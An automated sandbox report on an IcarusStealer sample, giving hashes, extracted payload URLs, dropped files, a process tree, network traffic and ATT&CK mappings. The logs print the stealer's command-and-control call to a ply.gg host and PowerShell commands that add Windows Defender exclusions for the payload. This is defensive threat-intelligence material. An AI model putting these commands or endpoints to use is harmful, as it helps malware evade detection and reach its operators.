icarusstealer | 13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

Analysis

max time kernel
6s
max time network
12s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
09/03/2024, 05:46 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

custom1.exe
Size

24.9MB
MD5

4e1c29f0c1af62ddea916c6b80548c76
SHA1

38d9f15356b6a65f4e76ee739867d55b01493793
SHA256

13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
SHA512

f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28
SSDEEP

49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF

Score

10^/10

icarusstealer persistence stealer

Malware Config

Extracted

Family

icarusstealer

Attributes

payload_url
https://blackhatsec.org/add.jpg

https://blackhatsec.org/remove.jpg

Signatures

IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
stealer icarusstealer

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Executes dropped EXE 4 IoCs

pid	Process
2924	Client.exe
2676	switched.exe
2860	pulse x loader.exe
2608	tesetey.exe

Loads dropped DLL 5 IoCs

pid	Process
1972	custom1.exe
1972	custom1.exe
2676	switched.exe
2676	switched.exe
768	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
16	raw.githubusercontent.com
17	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
20	ipinfo.io

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2608 set thread context of 1632	2608	tesetey.exe	41

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2608	tesetey.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2608	tesetey.exe
Token: SeShutdownPrivilege	1476	explorer.exe
Token: SeShutdownPrivilege	1476	explorer.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 1972 wrote to memory of 2924	1972	custom1.exe	28
PID 1972 wrote to memory of 2924	1972	custom1.exe	28
PID 1972 wrote to memory of 2924	1972	custom1.exe	28
PID 1972 wrote to memory of 2924	1972	custom1.exe	28
PID 1972 wrote to memory of 2676	1972	custom1.exe	29
PID 1972 wrote to memory of 2676	1972	custom1.exe	29
PID 1972 wrote to memory of 2676	1972	custom1.exe	29
PID 1972 wrote to memory of 2676	1972	custom1.exe	29
PID 2676 wrote to memory of 2860	2676	switched.exe	30
PID 2676 wrote to memory of 2860	2676	switched.exe	30
PID 2676 wrote to memory of 2860	2676	switched.exe	30
PID 2676 wrote to memory of 2860	2676	switched.exe	30
PID 2676 wrote to memory of 2608	2676	switched.exe	31
PID 2676 wrote to memory of 2608	2676	switched.exe	31
PID 2676 wrote to memory of 2608	2676	switched.exe	31
PID 2676 wrote to memory of 2608	2676	switched.exe	31
PID 2860 wrote to memory of 2360	2860	pulse x loader.exe	33
PID 2860 wrote to memory of 2360	2860	pulse x loader.exe	33
PID 2860 wrote to memory of 2360	2860	pulse x loader.exe	33
PID 2360 wrote to memory of 2448	2360	cmd.exe	35
PID 2360 wrote to memory of 2448	2360	cmd.exe	35
PID 2360 wrote to memory of 2448	2360	cmd.exe	35
PID 2360 wrote to memory of 2516	2360	cmd.exe	36
PID 2360 wrote to memory of 2516	2360	cmd.exe	36
PID 2360 wrote to memory of 2516	2360	cmd.exe	36
PID 2360 wrote to memory of 2508	2360	cmd.exe	37
PID 2360 wrote to memory of 2508	2360	cmd.exe	37
PID 2360 wrote to memory of 2508	2360	cmd.exe	37
PID 2608 wrote to memory of 2748	2608	tesetey.exe	38
PID 2608 wrote to memory of 2748	2608	tesetey.exe	38
PID 2608 wrote to memory of 2748	2608	tesetey.exe	38
PID 2608 wrote to memory of 2748	2608	tesetey.exe	38
PID 2748 wrote to memory of 2140	2748	csc.exe	39
PID 2748 wrote to memory of 2140	2748	csc.exe	39
PID 2748 wrote to memory of 2140	2748	csc.exe	39
PID 2748 wrote to memory of 2140	2748	csc.exe	39
PID 2608 wrote to memory of 1476	2608	tesetey.exe	40
PID 2608 wrote to memory of 1476	2608	tesetey.exe	40
PID 2608 wrote to memory of 1476	2608	tesetey.exe	40
PID 2608 wrote to memory of 1476	2608	tesetey.exe	40
PID 2608 wrote to memory of 1632	2608	tesetey.exe	41
PID 2608 wrote to memory of 1632	2608	tesetey.exe	41
PID 2608 wrote to memory of 1632	2608	tesetey.exe	41
PID 2608 wrote to memory of 1632	2608	tesetey.exe	41
PID 2608 wrote to memory of 1632	2608	tesetey.exe	41
PID 2608 wrote to memory of 1632	2608	tesetey.exe	41
PID 2608 wrote to memory of 1632	2608	tesetey.exe	41
PID 2608 wrote to memory of 1632	2608	tesetey.exe	41
PID 2608 wrote to memory of 1632	2608	tesetey.exe	41
PID 2608 wrote to memory of 768	2608	tesetey.exe	42
PID 2608 wrote to memory of 768	2608	tesetey.exe	42
PID 2608 wrote to memory of 768	2608	tesetey.exe	42
PID 2608 wrote to memory of 768	2608	tesetey.exe	42
PID 1476 wrote to memory of 2112	1476	explorer.exe	44
PID 1476 wrote to memory of 2112	1476	explorer.exe	44
PID 1476 wrote to memory of 2112	1476	explorer.exe	44
PID 768 wrote to memory of 1220	768	cmd.exe	45
PID 768 wrote to memory of 1220	768	cmd.exe	45
PID 768 wrote to memory of 1220	768	cmd.exe	45
PID 768 wrote to memory of 1220	768	cmd.exe	45

C:\Users\Admin\AppData\Local\Temp\custom1.exe
"C:\Users\Admin\AppData\Local\Temp\custom1.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1972
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Executes dropped EXE
  PID:2924
- C:\Users\Admin\AppData\Local\Temp\switched.exe
  "C:\Users\Admin\AppData\Local\Temp\switched.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2676
- - C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
    "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2360
    - - C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
        5⤵
        
        PID:2448
    - - C:\Windows\system32\find.exe
        
        find /i /v "md5"
        5⤵
        
        PID:2516
    - - C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        5⤵
        
        PID:2508
- - C:\Users\Admin\AppData\Local\Temp\tesetey.exe
    "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2608
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hwfcznc2\hwfcznc2.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2748
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4846.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF5046938BF61461280E219CD4B377E9C.TMP"
        5⤵
        
        PID:2140
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies Installed Components in the registry
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1476
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:2112
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
      4⤵
      PID:1632
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
        5⤵
        
        PID:1400
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        6⤵
        
        PID:2656
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
        5⤵
        
        PID:2276
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
        6⤵
        
        PID:2636
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:768
    - - C:\Users\Admin\AppData\Local\Temp\Start.exe
        
        C:\Users\Admin\AppData\Local\Temp\Start.exe
        5⤵
        
        PID:1220

Network

DNS

keyauth.win

pulse x loader.exe

Remote address:

8.8.8.8:53

Request

keyauth.win

IN A

Response

keyauth.win

IN A

172.67.72.57

keyauth.win

IN A

104.26.0.5

keyauth.win

IN A

104.26.1.5
POST

https://keyauth.win/api/1.2/

pulse x loader.exe

Remote address:

172.67.72.57:443

Request

POST /api/1.2/ HTTP/1.1
Host: keyauth.win
Accept: */*
Content-Length: 135
Content-Type: application/x-www-form-urlencoded

Response

HTTP/1.1 200 OK

Date: Sat, 09 Mar 2024 05:47:10 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 442
Connection: keep-alive
signature: 84405cbabcda27164f9e861416fe7c51c2400bcb223b972f69bf1c70c6b56498
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AeZMuNJlzTX6cJMxZpRc8wBwegIbhySwMMsuMeic0W0P%2BT1n09AFDQF4dW6Idtp7V1XC3I1YhwaUUWNRdIvAOiUBTV%2F7kL%2BFCOseG5LhajQOoKEL2Wy1njj2U%2FhW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Acknowledge: Credit to VaultCord.com
X-Powered-By: VaultCord.com
content-security-policy: upgrade-insecure-requests
permissions-policy: accelerometer=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
referrer-policy: strict-origin-when-cross-origin
strict-transport-security: max-age=31536000; includeSubDomains
x-content-security-policy: img-src *; media-src * data:;
x-content-type-options: nosniff
x-frame-options: DENY
x-xss-protection: 1; mode=block
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: *
Access-Control-Allow-Origin: *
Server: cloudflare
CF-RAY: 8618c4ce0fba3862-LHR
DNS

apps.identrust.com

Remote address:

8.8.8.8:53

Request

apps.identrust.com

IN A

Response

apps.identrust.com

IN CNAME

identrust.edgesuite.net

identrust.edgesuite.net

IN CNAME

a1952.dscq.akamai.net

a1952.dscq.akamai.net

IN A

96.17.179.205

a1952.dscq.akamai.net

IN A

96.17.179.184
GET

http://apps.identrust.com/roots/dstrootcax3.p7c

Remote address:

96.17.179.205:80

Request

GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

Response

HTTP/1.1 200 OK

X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Sat, 09 Mar 2024 06:47:08 GMT
Date: Sat, 09 Mar 2024 05:47:08 GMT
Connection: keep-alive
DNS

x2.c.lencr.org

Remote address:

8.8.8.8:53

Request

x2.c.lencr.org

IN A

Response

x2.c.lencr.org

IN CNAME

crl.root-x1.letsencrypt.org.edgekey.net

crl.root-x1.letsencrypt.org.edgekey.net

IN CNAME

e8652.dscx.akamaiedge.net

e8652.dscx.akamaiedge.net

IN A

173.222.13.40
GET

http://x2.c.lencr.org/

Remote address:

173.222.13.40:80

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: x2.c.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/pkix-crl
Last-Modified: Mon, 12 Feb 2024 22:07:27 GMT
ETag: "65ca969f-12b"
Cache-Control: max-age=3600
Expires: Sat, 09 Mar 2024 06:47:10 GMT
Date: Sat, 09 Mar 2024 05:47:10 GMT
Content-Length: 299
Connection: keep-alive
DNS

raw.githubusercontent.com

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.111.133
DNS

case-shield.gl.at.ply.gg

Remote address:

8.8.8.8:53

Request

case-shield.gl.at.ply.gg

IN A

Response

case-shield.gl.at.ply.gg

IN A

147.185.221.17
DNS

ipinfo.io

Remote address:

8.8.8.8:53

Request

ipinfo.io

IN A

Response

ipinfo.io

IN A

34.117.186.192
GET

http://ipinfo.io/ip

Remote address:

34.117.186.192:80

Request

GET /ip HTTP/1.1
Host: ipinfo.io
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

server: nginx/1.24.0
date: Sat, 09 Mar 2024 05:47:15 GMT
content-type: text/plain; charset=utf-8
Content-Length: 12
access-control-allow-origin: *
x-envoy-upstream-service-time: 1
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains

172.67.72.57:443

https://keyauth.win/api/1.2/

tls, http

pulse x loader.exe

1.0kB
7.0kB
10
11

HTTP Request

POST https://keyauth.win/api/1.2/

HTTP Response

200
96.17.179.205:80

http://apps.identrust.com/roots/dstrootcax3.p7c

http

323 B
1.6kB
4
4

HTTP Request

GET http://apps.identrust.com/roots/dstrootcax3.p7c

HTTP Response

200
173.222.13.40:80

http://x2.c.lencr.org/

http

298 B
720 B
4
3

HTTP Request

GET http://x2.c.lencr.org/

HTTP Response

200
172.67.72.57:443

keyauth.win

tls

pulse x loader.exe

922 B
7.9kB
9
10
127.0.0.1:49219

pulse x loader.exe
127.0.0.1:49221

pulse x loader.exe
185.199.108.133:443

raw.githubusercontent.com

tls

876 B
5.0kB
8
10
147.185.221.17:26501

case-shield.gl.at.ply.gg

301 B
172 B
4
4
127.0.0.1:49250

pulse x loader.exe
127.0.0.1:49252

pulse x loader.exe
34.117.186.192:80

http://ipinfo.io/ip

http

251 B
766 B
4
4

HTTP Request

GET http://ipinfo.io/ip

HTTP Response

200

8.8.8.8:53

keyauth.win

dns

pulse x loader.exe

57 B
105 B
1
1

DNS Request

keyauth.win

DNS Response

172.67.72.57

104.26.0.5

104.26.1.5
8.8.8.8:53

apps.identrust.com

dns

64 B
165 B
1
1

DNS Request

apps.identrust.com

DNS Response

96.17.179.205

96.17.179.184
8.8.8.8:53

x2.c.lencr.org

dns

60 B
165 B
1
1

DNS Request

x2.c.lencr.org

DNS Response

173.222.13.40
8.8.8.8:53

raw.githubusercontent.com

dns

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.108.133

185.199.109.133

185.199.110.133

185.199.111.133
8.8.8.8:53

case-shield.gl.at.ply.gg

dns

70 B
86 B
1
1

DNS Request

case-shield.gl.at.ply.gg

DNS Response

147.185.221.17
8.8.8.8:53

ipinfo.io

dns

55 B
71 B
1
1

DNS Request

ipinfo.io

DNS Response

34.117.186.192

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
4.5MB

MD5
ff219c8c219807ee57e76c79a1c41d07

SHA1
9c61f0def535267fbdc388c0dd198fb19ccf07b8

SHA256
6916849fca5276d5d9fb61ea504d1fd1c760d31ea7d8f59944623e2570b769ef

SHA512
dba3259b17d27814ebf2a598947348276375a560c5137310a6c38da882f47f2d1a2e83ed51491296dcf8bc6d4d9d666331271b01b93fc456002dea6876295b31

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
3.8MB

MD5
33732ed02a4d34c2e2922b76dfa7c23d

SHA1
a615d466c06c7894b4c2c11111b174a780870fa3

SHA256
1567983142e9d7e761e444acb7607d434fd39889e586101f88be4a68d7100498

SHA512
2dbac37991dfb8e7d0aa9f5316fc724ac59996fb994f5f035e2a316eef5bbdb31245d17be0c3d9237b9727f88fae994fef73d3a72e2d512e177a8d35c600883d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4846.tmp

Filesize
1KB

MD5
108813d4d95b23ff428e36f7842c108f

SHA1
28b02fcbd3ad04f2bffd68730145d95ae73fae3c

SHA256
fd009b184fa1e596b036e2e282f13ae634a7f05c71e82ebfc654f7af1ced30bf

SHA512
4f4e24eaec8b9978fa25280ef1346631c6b08b44fb3e77ddb0d1fbc8f6e1b95c1849433eb14ee8230fcc8b033b492feaa9d5fdd5f47fdbf33c6fd0f0eb49a91e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Start.exe

Filesize
4KB

MD5
a599003d7babea10acb2ab86aa6b90e0

SHA1
057c92c1d8efa27e3ae42cd7c63c740e59e8372b

SHA256
6e233bc767d9ccbcb709962438d86d01092738877848ddca19feca74dd55a389

SHA512
0a3401ae0f282537a9024f5ca35ee99fa95a07b1eadcb79b7fdbc9b4403baa9f1dda3787a5264058e1e312af89e758a9fa4b9a014ca8875f596364c70f0cae13

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
1.5MB

MD5
6aaa2ef583feb7c5c15353cb5bfda6b9

SHA1
f6a4124bae93217ff03feb5a3ffc2deb6eb0a7e9

SHA256
a2cc60512fce35bf126173d566507bae472539906c33a003f02895b7725682f2

SHA512
1e557174da97c52b85848fd11bdd7677257f55915d48cc33b6b57bff3b588332317231d7f84ecaff7ca40db7feaccaf23e94fe6d41c75e1a7b6832d344b8708b

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
2.2MB

MD5
e9f1d5e4e4e2569d6f8af2a3bc66e5da

SHA1
52779ad0002208eefee98a0c3540bca3a9f1d52f

SHA256
052c422833a7e87163a8e2a0050ab024ee3191eab116d15ff722e7275acbfe75

SHA512
fc81c90c0a8189c75fbac20b33cdaf78d8cb6e635d64ef3c9380b164377ffc844acb43794d37395184319c1d70a4c8c57f8bc8b16d321db067e659ba6662d272

Download Submit
C:\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
3.7MB

MD5
b9bbe31d276de5c3d05352d070ae4244

SHA1
5e1bb67b01c579b4e0ad5a7475ceb657201c27ec

SHA256
a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d

SHA512
0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
494KB

MD5
0f0838bc6642dd6bc603368e50b4aba3

SHA1
932bd4d1c11996bf8ac3ac74a94b266e96d44c36

SHA256
4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

SHA512
a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KPA2UK7ILI5E2B2QDPTT.temp

Filesize
7KB

MD5
4f6f6ff03f52bd381d1713ff4d35a16d

SHA1
f599a0b9894b2deb6b24f136678ebbeed6998a80

SHA256
d5d25a88ae7e189c2c30438d0ff3eaee6a1e3650a9927abb909bb7becd6e156a

SHA512
9fcc9c9437d715ae600bea03fbd7e51245c0a2d9cd0e7df2b6406060071d481ac923290d6a14d67693243597d28b80e301dd865fab87615a3c3223d05de17db6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCF5046938BF61461280E219CD4B377E9C.TMP

Filesize
1KB

MD5
810535a8ae563d6aa53635a1bb1206ff

SHA1
f5ba39f1a455eb61efe5022b524892249ee75dce

SHA256
7f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f

SHA512
5662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hwfcznc2\hwfcznc2.0.cs

Filesize
1KB

MD5
14846c9faaef9299a1bf17730f20e4e6

SHA1
8083da995cfaa0e8e469780e32fcff1747850eb6

SHA256
61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

SHA512
549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hwfcznc2\hwfcznc2.cmdline

Filesize
447B

MD5
73464ad5ce5d83dd66ab507de09ee137

SHA1
cf902f2d11b93008c10a63f04d5ad854d50db15b

SHA256
544f1146819cce0a68b6445b2a3a9c2877a294f9d318e186f47d4968d4825ccb

SHA512
1247a4c3ec2c68b7a49389ca0c170d3f1deac496abbbfe3eadd0a11529b5d3f6b53c76265fdb90a87bfd8f1dbb66318a32e2f6bfd7b0263974fbc769aee42c60

Download Submit
\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
5.9MB

MD5
c97e31cd3728516fe68c93ffc4a11d78

SHA1
248aa9330b5508d433ce98ff6ddb250bdd1f069d

SHA256
f0fec07e7b06e4f817330155b371d8b10bd5fae8dd6f143ef295cc30f56efac5

SHA512
db47718ed9592effc65f1a0a5ba50f07cb1f0257941733c7dd9b8d4921d18cb16c70554e9c4fba50eff1a7b3d6a5fc96ebc82df6c41fd2ff784a7268506bd725

Download Submit
\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
1.6MB

MD5
3e359df762ce2cca4fa21b0aa438b532

SHA1
cd3a11ed9cfb6c4a1f6b29ffb4d4855372c5378e

SHA256
c72a672ead28482da2e06879b26a6a018a054f0e52f9b015adac64380d6e30c5

SHA512
a636c71adb2865d4f62fecd9942f8792a22dc623930f6d1db742be48607d44a30ff445f92708a026cc7820f93d4abd6f65dc5187c17a3ac39c9909ba050e8364

Download Submit
memory/1220-61-0x0000000000180000-0x0000000000188000-memory.dmp

Filesize
32KB

Download
memory/1220-64-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

Filesize
9.9MB

Download
memory/1220-85-0x000000001B070000-0x000000001B0F0000-memory.dmp

Filesize
512KB

Download
memory/1632-57-0x0000000074A80000-0x000000007516E000-memory.dmp

Filesize
6.9MB

Download
memory/1632-65-0x0000000004AF0000-0x0000000004B30000-memory.dmp

Filesize
256KB

Download
memory/1632-44-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1632-46-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1632-49-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/1632-48-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1632-47-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1632-50-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1632-54-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1632-52-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2608-63-0x0000000074A80000-0x000000007516E000-memory.dmp

Filesize
6.9MB

Download
memory/2608-30-0x0000000004B60000-0x0000000004BA0000-memory.dmp

Filesize
256KB

Download
memory/2608-33-0x0000000074A80000-0x000000007516E000-memory.dmp

Filesize
6.9MB

Download
memory/2608-27-0x00000000009B0000-0x0000000000A32000-memory.dmp

Filesize
520KB

Download
memory/2636-76-0x00000000029D0000-0x0000000002A10000-memory.dmp

Filesize
256KB

Download
memory/2636-80-0x00000000029D0000-0x0000000002A10000-memory.dmp

Filesize
256KB

Download
memory/2636-83-0x00000000029D0000-0x0000000002A10000-memory.dmp

Filesize
256KB

Download
memory/2636-82-0x000000006F720000-0x000000006FCCB000-memory.dmp

Filesize
5.7MB

Download
memory/2636-75-0x000000006F720000-0x000000006FCCB000-memory.dmp

Filesize
5.7MB

Download
memory/2656-78-0x000000006F720000-0x000000006FCCB000-memory.dmp

Filesize
5.7MB

Download
memory/2656-77-0x00000000003E0000-0x0000000000420000-memory.dmp

Filesize
256KB

Download
memory/2656-79-0x00000000003E0000-0x0000000000420000-memory.dmp

Filesize
256KB

Download
memory/2656-81-0x00000000003E0000-0x0000000000420000-memory.dmp

Filesize
256KB

Download
memory/2656-84-0x000000006F720000-0x000000006FCCB000-memory.dmp

Filesize
5.7MB

Download
memory/2860-29-0x000000013FF60000-0x000000014039C000-memory.dmp

Filesize
4.2MB

Download
memory/2860-62-0x000000013FF60000-0x000000014039C000-memory.dmp

Filesize
4.2MB

Download
memory/2924-60-0x0000000004D30000-0x0000000004D70000-memory.dmp

Filesize
256KB

Download
memory/2924-28-0x0000000074A80000-0x000000007516E000-memory.dmp

Filesize
6.9MB

Download
memory/2924-24-0x00000000003D0000-0x0000000000A10000-memory.dmp

Filesize
6.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.